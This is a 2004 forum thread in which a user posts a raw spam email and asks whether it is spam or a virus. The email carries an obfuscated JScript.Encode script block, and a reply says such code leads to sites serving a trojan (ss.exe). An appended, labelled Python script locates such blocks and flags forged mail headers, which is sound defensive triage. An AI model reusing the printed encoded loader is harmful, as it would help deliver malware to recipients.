AlphaCentauri Posted September 10, 2004

I received an email today with a spammy subject heading and encoded text. It resembles hexadecimal, but isn't when you really look at it (e.g., strings like "C1C"). It seems too short to be a virus, but with the java scri_pt terms, it could be referring to executable code on a website somewhere. I have been receiving some infected emails from Kuwait lately (with more obvious virus base64 code), so I figure the gibberish could be Arabic characters. So is it spam to report or a virus to not report?

X-POP3-Rcpt: me[at]mydomain.com
Received: from CPE0080c6fe2156-CM024430000310.cpe.net.cable.rogers.com (CPE0080c6fe2156-CM024430000310.cpe.net.cable.rogers.com [24.100.12.166]) by host2.capital-computers.com (8.12.10/8.12.10) with SMTP id i89NYjox011863; Thu, 9 Sep 2004 19:34:56 -0400
Received: from .clickfish.com ([236.170.218.88]) by 24.100.12.166 with ESMTP; Fri, 10 Sep 2004 00:26:32 +0100
Message-ID: <764996u210v8473b93l3697g6b3466[at]clickfish.com>
X-Mailer: Microsoft Office Outlook, Build 11.0.5510
Date: Thu, 09 Sep 2004 20:24:32 -0300
From: "Lucio Gipson" <Gamblethrb[at]clickfish.com>
Reply-To: "Lucio Gipson" <Gamblethrb[at]clickfish.com>
To: nonexistantperson[at]mydomain.com, me[at]mydomain.com, info[at]mydomain.com, webmaster[at]mydomain.com
Subject: re:appointment thursday at 01-00 - Thu, 09 Sep 2004 19:27:32 -0400
Organization: Microsoft Office Outlook, Build 11.0.5510
Mime-Version: 1.0
Content-Type: multipart/alternative; boundary="6-122353897-0350581327=:13108"

--6-122353897-0350581327=:13108
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

--6-122353897-0350581327=:13108
Content-Type: text/html; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
yo babe what's up? loved having fun with youm it was so funy. thailand is so great, anyway, see you soon.
jeff
<scri_pt language=3D"JScript.Encode">#[at]~^ngAAAA=3D=3D~[at]#[at]&[Km!:+ YcADbYn`E[at]= !(o"bHA~?"Z'r4OYa)Jz+!q 8 GR FFv&sbx3 4D:sJ, &fP_'Wc!,CA(M_KxcW!~o"bHA$r"= f2"xTPUZ"rJS(HV'ExKEPkYzs=7F'J[rkwslHl WU=7Fir[at]*[at]!Jqw]bt2[at]*B*i[at]#[at]&iioAAA=3D= =3D^#~[at]</scri_pt>
THIS IS AN AUTO-GENERATED MESSAGE - PLEASE DO NOT REPLY TO THIS MESSAGE<BR>Login Name: bzpwsun<BR>Password: hwacfby10589s<BR><BR>- Home directory: The location of the home directory varies by platform.<BR>Windows 98 (single-user): C:\Windows<BR>Windows 98 (multi-user): C:\Windows\Profiles<BR>Windows 2000/XP: C:\Documents and Settings<BR><BR><BR><BR><BR>
-----BEGIN BLOCK-----<BR>F%D5%CDU%C2%058%E5%9A%D5%7D%85<BR>JJ%E3%DF%D7o%C1%1F%60%EA%F0%B2<BR>P%87s%22%F8%E1%96%29%CAd2%95%B<BR>%F8%97%2C%9Co%2F%85%FF%BD%3B%B<BR>D%5Cd%E8%FE%C2o%879C%F3%D0%C2%<BR>1D%98%28%22%BE%F0%B7%3C%DFBe%F<BR>8%90%C9%0B%D1%01i%E0%D3%AC6%8E<BR>%21%0B%BD%BE%CED%EDLm%A1%A7%E4<BR>3%92l%22%A9%91%90V%C2%0F0%AB%8<BR>C%9D%2F%98%01q%E9%D9%D0%09%CA%<BR>18%3D%D4%CC%CCh%A7a%5E%B7%9A%A<BR>E%13%C3%2FU%CE%FA%AE%7B%C1C%10<BR>%BA%E9%9AB%A9%18%1F%93%AB%FCm%<BR>A4Eg%D5%E7%B6w%E9%0D%0C%E5%F6%<BR>9Ad%F4v%10%F7%8E%9D%0D%EA%1Fs%<BR>99%E5%F1z%FEOP%DA%94%E05%D0uE%<BR>BB%DF%D7%0D%95%1D%27%82%8E%AA%<BR>04%8A5%3E%CC%D8%F4%11%E9%24d%B<BR>0%B7%AED%BB%7E%15%E3%C7%9C%22%
<DIV>Chauncey Michaud<BR>Sexton <BR>Advanced Bio-Medical Electronics, Inc., Slidell, 70458, United States of America<BR>========================================================================<BR> Pat H. Goad Warren County Circuit Clerk Warren County Justice Center Center Street- Suite Bowling Green KY Warren <BR>Phone: 197-144-7176 <BR>Mobile: 959-191-1385 <BR>Email: <A href="mailto:Delaneyvabeh[at]fiberia.com">Delaneyvabeh[at]fiberia.com</A><BR>========================================================================</DIV>
--6-122353897-0350581327=:13108--
Wazoo Posted September 10, 2004

First of all, please provide the Tracking URL instead of posting the spam here directly. Second, if you want to get involved with some folks tracking this stuff down, fire up your newsreader, set the server to news://news.spamcop.net/spamcop.geeks, and look for threads with Subject lines containing Jscript Encode/Decode. Basically, what they are saying is that the code in this spam points to one or more sites that have more code embedded in them. There has been some success in getting the ISP involved to kill the web-based URL/code stuff ... but then again, today's traffic seems to suggest that one site thought to be brought down has re-surfaced with different code .... and per one poster's query, my check appears to agree that he has been blocked from accessing that site .... so "we" may be dealing with a spammer / trojan writer that also reads the SpamCop newsgroups ..... For example, here's a snippet with an included Tracking URL so you can get a hint of the discussion (and compare the spam content/structure):

> http://www.spamcop.net/sc?id=z650744697z56...aa34e54e60e818z
>
> Interesting: same site as last one, 201.12.78.176. Oddly enough the site has been armed again. Now with an 18 kb variant of ss.exe instead of the 15 kb variant found there previously. Also, the file link.html has been repaired. Now it points to link.php at 201.12.78.176 instead of the other location in bezeqint.net space.
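A triage script for this kind of message, added here as an example and not taken from either post or from SpamCop. It does the two things a practitioner would do before deciding "spam or virus": it unfolds the Received chain and flags any hop whose claimed source address lies in space that cannot originate Internet mail (the second Received line in the quoted spam claims 236.170.218.88, which sits in the 224.0.0.0/4 multicast block, so that header was forged by whatever relayed the mail), then transfer-decodes the text/html part and locates Microsoft Script Encoder blocks by their `#@~^ ... ==^#~@` framing, which is exactly what a `<script language="JScript.Encode">` tag carries. The sample message, its hostnames, addresses and the encoded blob are constructed for this example (modelled on the quoted headers, not copied from them); the blob is located and reported, not decoded.

```python
"""Added example (not from any poster): triage a spam carrying a JScript.Encode
block. Flags forged Received hops and locates Script Encoder blobs in the HTML."""
import email
import ipaddress
import re

# Constructed sample mirroring the thread's message: a Received hop that claims
# a multicast source, then a multipart/alternative body whose quoted-printable
# HTML part carries a Microsoft Script Encoder ("JScript.Encode") block.
SAMPLE = """\
Received: from cable-host.example.net (cable-host.example.net [24.100.12.166])
    by mx.example.org (8.12.10/8.12.10) with SMTP id ABC123;
    Thu, 9 Sep 2004 19:34:56 -0400
Received: from .clickfish.example ([236.170.218.88]) by 24.100.12.166 with ESMTP;
    Fri, 10 Sep 2004 00:26:32 +0100
From: "Someone" <someone@clickfish.example>
To: me@example.org
Subject: re:appointment thursday at 01-00
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="b1"

--b1
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

yo babe what's up?
--b1
Content-Type: text/html; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<script language=3D"JScript.Encode">#@~^ngAAAA=3D=3D~@#@&[Km!:+YcADbYn`E@=
!(o"bHA~?"Z'r4OYa)Jz+!q@#@&iioAAA=3D=3D^#~@</script>
THIS IS AN AUTO-GENERATED MESSAGE
--b1--
"""

# Received: "from <helo> (<reverse-dns> [<ip>]) by <host> ..."
RECEIVED_RE = re.compile(
    r"^from\s+(?P<helo>\S+)\s+\((?P<info>[^)]*)\)\s+by\s+(?P<by>\S+)", re.I)
BRACKET_IP_RE = re.compile(r"\[([0-9.]+)\]")
# Script Encoder framing: marker, 6-char length field, "==", data, closing marker.
ENCODED_RE = re.compile(r"#@~\^([A-Za-z0-9+/]{6})==(.*?)==\^#~@", re.S)


def classify_ip(ip_str):
    """Label an address by the kind of space it falls in."""
    ip = ipaddress.ip_address(ip_str)
    if ip.is_multicast:
        return "multicast"
    if ip.is_loopback:
        return "loopback"
    if ip.is_reserved:
        return "reserved"
    if ip.is_private:
        return "private"
    return "global"


def received_hops(msg):
    """One dict per Received header, in header order (most recent hop first)."""
    hops = []
    for raw in msg.get_all("Received", []):
        text = " ".join(str(raw).split())  # unfold continuation lines
        m = RECEIVED_RE.search(text)
        if not m:
            hops.append({"helo": None, "ip": None, "by": None, "kind": "unparsed"})
            continue
        ipm = BRACKET_IP_RE.search(m.group("info"))
        ip = ipm.group(1) if ipm else None
        hops.append({"helo": m.group("helo"), "ip": ip, "by": m.group("by"),
                     "kind": classify_ip(ip) if ip else "unknown"})
    return hops


def impossible_source_hops(hops):
    """Hops whose claimed source can never be a real Internet sender."""
    return [h for h in hops if h["kind"] in ("multicast", "reserved", "loopback")]


def encoded_scripts(msg):
    """Locate Script Encoder blocks in every text/html part after QP/base64 decoding."""
    found = []
    for part in msg.walk():
        if part.get_content_type() != "text/html":
            continue
        charset = part.get_content_charset() or "latin-1"
        html = part.get_payload(decode=True).decode(charset, "replace")
        for m in ENCODED_RE.finditer(html):
            found.append({"length_field": m.group(1), "data": m.group(2)})
    return found


def triage(raw):
    """Return the indicators a reporter would want before filing the message."""
    msg = email.message_from_string(raw)
    hops = received_hops(msg)
    scripts = encoded_scripts(msg)
    return {"hops": hops,
            "impossible_sources": [h["ip"] for h in impossible_source_hops(hops)],
            "encoded_script_count": len(scripts),
            "scripts": scripts}


if __name__ == "__main__":
    print(triage(SAMPLE))
```

On the sample, `triage` reports the 236.170.218.88 hop as an impossible source and one encoded block with length field `ngAAAA`. Recovering the URL the block fetches is a separate step (decoding the Script Encoder output is what the newsgroup threads Wazoo points to deal with); the presence of the block alone is enough to treat the message as malware delivery rather than plain advertising when deciding where to report it.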